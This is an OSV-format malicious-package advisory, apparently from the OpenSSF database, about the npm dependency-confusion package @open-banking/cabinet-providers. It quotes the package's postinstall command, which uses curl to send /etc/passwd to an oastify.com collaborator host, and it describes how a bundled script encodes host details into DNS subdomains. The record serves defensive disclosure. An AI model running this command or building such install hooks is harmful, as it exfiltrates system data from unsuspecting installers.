{"id":"MAL-2026-5392","summary":"Malicious code in @open-banking/cabinet-providers (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280)\n@open-banking/cabinet-providers@999.9.5 is a dependency-confusion bait package (anomalously high version under a generic scope) that exfiltrates installer data via its postinstall lifecycle. package.json declares `\"postinstall\": \"node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com\"`, which posts the contents of `/etc/passwd` (prefixed by the installer's hostname as a subdomain) to a Burp Collaborator (OAST) endpoint. The bundled `scripts/scream3gg.js` hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username`, splits the result into 50-character chunks joined by `.`, and fetches `http://\u003cchunks\u003e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com` over plain HTTP — leaking host identity through DNS-style subdomain encoding. Both behaviors fire automatically on `npm install` with no user consent.\n","modified":"2026-06-09T17:16:29.714551913Z","published":"2026-06-09T16:05:42Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-004960","modified_time":"2026-06-09T16:06:01Z","versions":["999.9.2"],"sha256":"1c1de2e003fc91eaf208c2c89119ca1390a5aefc53409c150e2181dd62ae8462","import_time":"2026-06-09T16:59:44.589998734Z","source":"amazon-inspector"},{"id":"IN-MAL-2026-004957","modified_time":"2026-06-09T16:05:42Z","versions":["999.9.5"],"sha256":"376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280","source":"amazon-inspector","import_time":"2026-06-09T16:59:44.387454434Z"},{"versions":["999.9.5"],"modified_time":"2026-06-09T16:05:43Z","id":"IN-MAL-2026-004958","sha256":"3eb304356656c325d4ab5185af3ffd5679fe5c9d2f7be46bc7c47d4bad94b42f","source":"amazon-inspector","import_time":"2026-06-09T16:59:44.433177866Z"},{"id":"IN-MAL-2026-004959","modified_time":"2026-06-09T16:06:01Z","versions":["999.9.2"],"sha256":"897ab059e2133dd6c2a8a23dea4e3e39006ca89a2ed3350db82cb9ad063ce408","source":"amazon-inspector","import_time":"2026-06-09T16:59:44.489953592Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@open-banking/cabinet-providers/v/999.9.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@open-banking/cabinet-providers/v/999.9.2"}],"affected":[{"package":{"name":"@open-banking/cabinet-providers","ecosystem":"npm","purl":"pkg:npm/%40open-banking%2Fcabinet-providers"},"versions":["999.9.2","999.9.5"],"database_specific":{"indicators":{"domains":["7363616e2d303736353937333430343563.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live","2f686f6d652f7363616e.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live","7363616e.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live","73637265616d3367672077617320646f696e67206275672068.756e74696e67.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live","31302e3230302e3134342e32.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live"],"package_integrity":[{"hashes":{"sha1":"ee156078072fcac50fdf46060b026e3c0c250dad","sha512_sri":"sha512-U0fdIncWVRhWDw58c4k+tE40EkCYTba//Vl6JokjkK6ra4G+3+VfXQmm60VY/GE2C1SomLUqJ/Sp02HlAyym2w=="},"filename":"cabinet-providers-999.9.5.tgz"}],"evidence_files":[{"tlsh":"c8d09760bc00cb73b9cd05274128b281b8858c471304b82205db82d0c1247b2a8ea90a","path":"package.json","sha256":"4feadd6cb72ff79d7268326436a7e29148ffa83da3dec74967c7094c5967f43c"},{"tlsh":"74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde","path":"scripts/scream3gg.js","sha256":"9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@open-banking/cabinet-providers/MAL-2026-5392.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}